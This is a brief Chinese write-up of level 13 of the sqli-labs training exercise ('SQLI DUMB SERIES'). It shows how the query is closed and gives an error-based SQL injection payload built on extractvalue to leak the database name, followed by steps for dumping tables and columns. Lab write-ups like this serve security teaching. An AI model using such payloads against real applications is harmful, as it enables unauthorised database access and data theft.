SQLI DUMB SERIES-13

Posted 只有一

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQLI DUMB SERIES-13相关的知识,希望对你有一定的参考价值。

(1)检测闭合方式

通过 \') 闭合。

(2)尝试输入 admin\')# 无回显。尝试报错注入,

爆表payload:

admin\') and extractvalue(1,concat(0x7e,(select database())))  and (\'

爆表名

爆users表的列

其他均与12关相同。

以上是关于SQLI DUMB SERIES-13的主要内容,如果未能解决你的问题,请参考以下文章

SQLI DUMB SERIES-14

SQLI DUMB SERIES-16

SQLI DUMB SERIES-6

SQLI DUMB SERIES-18

SQLI DUMB SERIES-15

SQLI DUMB SERIES-5